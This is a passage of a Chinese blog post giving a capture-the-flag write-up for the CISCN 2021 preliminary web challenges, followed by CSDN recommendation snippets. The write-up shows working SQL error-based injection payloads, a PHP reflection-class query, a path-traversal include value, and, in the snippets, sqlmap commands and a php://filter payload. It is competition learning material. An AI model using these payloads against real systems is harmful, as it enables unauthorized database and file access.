[CISCN2021]初赛

最新推荐文章于 2025-04-14 11:08:19 发布
最新推荐文章于 2025-04-14 11:08:19 发布
阅读量2k 收藏 7
点赞数 4
分类专栏: 比赛wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/116845451
版权
本文详细介绍了CISCN2021初赛的四个部分:通过SQL注入获取信息,利用PHP反射类解决原题,借助PHP_SESSION_UPLOAD_PROGRESS进行文件包含攻击,以及分析机械臂的流量包完成任务。参赛者需掌握SQL技巧、PHP源码理解和网络流量分析等技能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

easy_sql

无列名和报错注入

uname=123&passwd=123') AND EXTRACTVALUE(1,CONCAT(0x5e,(select * from (select * from flag as a join flag as b using(no,id))x)))--+

在这里插入图片描述
出了字段名1d004bae-a9e9-4f4e-8af1-c9518d464307

uname=qwe&passwd=') AND EXTRACTVALUE(1,CONCAT(0x5e,(select RIGHT(`column`,31) from flag)))--+

在这里插入图片描述
出了后段^rgiXT-97SMk-yiGwB-Ithem-Ozeer-}

flag还挺长,再出个前段CISCN{rgiXT-97SMk-yiGwB-Ithem-O
在这里插入图片描述

easy_source

原题

这题考察了php原生类的使用,参考ctfshow的web100

使用反射类new ReflectionClass("类名"),获得这个类的信息


/?rc=ReflectionMethod&ra=User&rb=q&rd=getDocComment

在这里插入图片描述

middle_source

<?php
    highlight_file(__FILE__);
    echo "your flag is in some file in /etc ";
    $fielf=$_POST["field"];
    $cf="/tmp/app_auth/cfile/".$_POST['cf'];
    
    if(file_exists($cf)){
   
        include $cf;
        echo $$field;
        exit;
    }
    else{
   
        echo "";
        exit;
    }
?>

PHP_SESSION_UPLOAD_PROGRESS加条件竞争进行文件包含

参考之前做的ctfshow的web 82-86

这里有phpinfo

field=1&cf=../../../var/www/html/you_can_seeeeeeee_me.php

在这里插入图片描述
拿到session的目录:/var/lib/php/sessions/eciaadedie/

post包:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content=
最低0.47元/天 解锁文章
2021国赛CISCN 初赛 部分RE writeup
weixin_45803474的博客
09-14 472
glass 题目名称:glass 题目描述:Reverse sign in,flag形式为"CISCN{XXXXX}" 首先查看apk 界面如下 用AndroidKiller打开,反编译成java源码 这里只是声明了一下checkflag函数 要去native-lib里找 分析\glass\Project\lib\armeabi-v7a中的libnative-lib.so IDA打开 怀疑是RC4加密 参考 https://www.cnblogs.com/SunsetR/p/12247041.html
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3
arttnba3的博客
05-21 853
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3[GITHUB BLOG ADDR](https://arttnba3.cn/2021/05/15/CTF-0X04-CISCN2021-PRELIMINARY/)0x00.绪论0x01.场景实操 开场卷pwny | Donelonelywolf | Donechannel0x02.场景实操 二阶卷silverwolf | Donegame0x03.场景实操 冲刺卷satool GITHUB BLOG A
2021 ciscn-pwn 初赛
csdn546229768的博客
06-05 725
2021全国大学生信息安全竞赛-pwny_init 分析 mainreadwrite这个程序其实就是两个核心函数,和名字一样,因为操作的fd指针是个随机参数文件,我们通过修改fd指针为0,也就是控制台就可以实现任意读写了,那么程序就简单了很简单我们看这个这里组的偏移是由我们决定的且没有大小限制(是int64类型的变量)。ok看看bss段qword_202060和随机函数的fd指针只相差0x100偏移,那么就可以间接的控制fd为0了,具体利用如下: 这里就可以将fd置为0,我也是gdb调试调试着就发现的,仔细
[CISCN2021] 初赛 easy_source
fightte的博客
05-21 552
[CISCN2021] 初赛 easy_source 国赛,很有经历和意义,希望继续挑战 国赛和大家做的一道题,国赛比较难,只有现在有时间回过去看看: 进去后,界面大概如上图, 提示如上图: 猜测备份文件,实际上当时没扫描出来,试了.svn .swp .swo等,后来别个提示才发现: 实际上前面要加一个点,也就是.index.php.swo 现在看来应该去考虑php的原生类反序列化,是一个典型题目: 使用[反射类]new ReflectionClass("类名"),获得这个类的信息 参考:http
CISCN2021】第十四届全国大学生信息安全竞赛初赛-writeup
../../../../../../../
05-17 4787
这一次比赛分为三张“卷子”,我就直接归在一起吧 场景实操Misctiny trafficrunning_pixel Misc tiny traffic 打开流量包 根据文件和题目描述,我们直接导出http对象 可以看到,列表里面含有gzip和br文件,Gzip是一种压缩文件格式并且也是一个在类 Unix 上的一种文件解压缩的软件,BR文件是使用Brotli(一种开源数据压缩算法)压缩的文件 导出来后对这几个gzip和br文件解压缩,先看看flag_wrapper 并没有啥实质性的内容 看看test和se
【WP】CISCN2021初赛-WEB部分
車鈊的博客
06-06 866
WEB Easysql 模糊测试 发现columns,information,union(大小写)被过滤 报错回显点 UNION联合注入无法使用,测试登录发现报错点 回显位和库名 我们采用报错注入,用and做语法连接 // 测试列数 wyx123')and(select 1)# // 爆破库名 wyx123')and(select updatexml(1,concat(0x7e,database(),0x7e),1))# 列名的猜解-无列名注入 当我们构造连接查询,对其加上using限制(using:
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1257
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
NSSCTF_crypto_[CISCN 2021初赛]rsa
最新发布
suisuisama的博客
04-14 1470
RSA p高位 低加密指数攻击 共模攻击
2021ciscn初赛web部分简单wp
weixin_45805993的博客
05-24 561
0x00. 简单的题不想写wp,难的题写不出来……这篇博客应该会比较水,不喜勿喷 0x01.easy_source Payload http://xxxxxxxxxx/index.php?rc=splFileobject&ra=.index.php.swo&ra=php://filter/read=convert.base64-encode/resource=index.php&rb=rb&rd=fgets 挺简单的,不细说了 用php原生类splFileObject,用ge
2021-CISCN-线上-misc-robot
zji
05-16 668
2021-CISCN-misc-robot 一、robot 示例:这个题主要是描述是,通过分析流量pcap和机器控制,看看给机器人发生了什么指令。 flag提示md5(指令) 格式CSICN 知识点 流量包查看+TCP跟踪流+导出内容+图像点坐标画图 解题 这玩意什么都看不出来啊 看看流量包 wireshark 跟踪流 想想如果把坐标值提取出来 我们导出文档txt 然后我们在提取坐标点 import re f = open('1.txt') s=f.read() #print(strs) r
ciscn_2021_lonelywolf.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
【misc】[CISCN 2021初赛]robot --流量包数据提取,坐标画图
question55的博客
11-17 192
打开附件的流量包可以发现有很多的tcp协议数据,追踪tcp协议数据看看可以发现tcp数据流中有很多类似坐标的东西,先把这些数据另存为txt保存,如何用正则表达式提取这些数据,提取脚本如下:import rewith open("data.txt", "r", encoding="utf-8") as f: data = f.read()pattern = r'tgPos\{\d+\}\.Value\.\[\d+,\d+,\d+\]' #正则表达式匹配results = re.fin
[CISCN 2021初赛]robot
luxury的博客
11-04 648
附件。
[CISCN 2021初赛]隔空传话
qq_47875210的博客
11-14 558
这个地方不太会的可以去看我之前的博文,链接:https://blog.csdn.net/qq_47875210/article/details/126171502?的内容下载到运行脚本的位置!(弄好PyExecJS),w465也就是width=465的意思了。:看看你能从这些数据里发现什么?注意事项:使用的我的代码时候,务必要把。宽度:465,高度:63,这也对应了。所以我们得到了第一段flag为。,因为需要调用dpu.js。水平翻转再垂直翻转就好了。
CISCN2021初赛习得
Wawyw's Blog
05-18 623
Web 1、easy_sql 这里简要记录下我的思路以及学到的姿势。 一开始经过几次尝试发现uname处存在注入点且为单引号括号闭合,在sql语句为真时,返回 login ,为假时空白,于是就傻乎乎认为是布尔盲注,而忽略了加引号时页面会返回报错信息。所以可以用更为简单的报错注入的题,而我却用布尔盲注捣鼓了半天。得到库名后,发现information被过滤,无法查表和列名。艰难绕过后,利用无列名注入,mysql字符串逐位比较把flag给试了出来,但可能因为大小写的原因导致提交错误,白干一场(后来才知道mysq
CISCN2021_0解题目(filter)
anwen12的博客
05-21 809
CISCN2021_0解题目(filter) 0x01 题目初现 题目复现简单,压缩包解压 这里可以关闭debugweb\index.php 首先点开zip文件,这个不用多说 然后还有hint 再联想一下还和log文件有关,那个必定是larval rce那个漏洞相关了。那就不多说了,有兴趣的可以去看看 VNCTF2021 中的lar题目:https://blog.csdn.net/anwen12/article/details/115127075(这个挺详细 原cve分析:https://xz.a
2021 全国大学生信息安全竞赛ciscn web wp
midi
05-19 2146
2021 ciscn web wpupload 复现几道没做出来的题:> upload 发现文件index.php、example.php 知识点1:绕过getimagesize 在上传的文件最后面加上 #define width 1 #define height 1 知识点2:绕过zip字符中的i 结合 https://bugs.php.net/bug.php?id=77375 使用İ字符可以绕过i字符的匹配,如果php这三个字符也能绕过就能直接上传php了~~,官方中发现只能针对这几个字符
WP-CISCN2021
热门推荐
ce666666的博客
06-14 1万+
前言 这次比赛让我看到只学习一门方向的痛苦。web平台修复,队友在疯狂做题,你却只能在旁边看着却不能帮助。有些题就是悍得悍死,捞得捞死。 Web 简单的注入 一道延时注入,我却在反复测试是否为联合还是其他注入,尝试fuzz,手工注入真的菜。 还是得靠sqlmap注入 Payload: 爆库:sqlmap.py –r txt –risk=3 --level=3 –p password –dbs 爆表:sqlmap.py –r txt –risk=3 –-level=3 –p password –D “数据库名
2021-CISCN-初赛 总结
Chmaz的博客
05-21 1127
第一次打ctf比赛,之前也没怎么做过题,果然被虐惨了,全队一个题也没做出来. 选择 几乎都看不懂,目前大一,专业知识几乎还未涉猎,还好是开卷,拿了625分. 杂项 Running_pixel 题目给了一个gif图 比赛时候想了很久,唯一能着手的点就是发现,gif每10帧图片会变色,但是就此思路就断了,怎么处理也没有什么思路. 其实当时一度离正确思路非常近, 当时我在第十帧经过处理后发现一个奇妙的点点.但是当时并没有多想. 结果正确思路就是把每十帧的图片对比每位像素,合在一张图上得到这样的图片,按顺序.
[ciscn 2019 初赛]love math
03-16
这道题目需要我们求出一个数列中所有数的最大公约数。我们可以使用欧几里得算法来求解。具体来说,我们可以用辗转相除的方法,不断将两个数中较大的数除以较小的数,直到两个数相等为止,此时的数即为它们的最大公...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值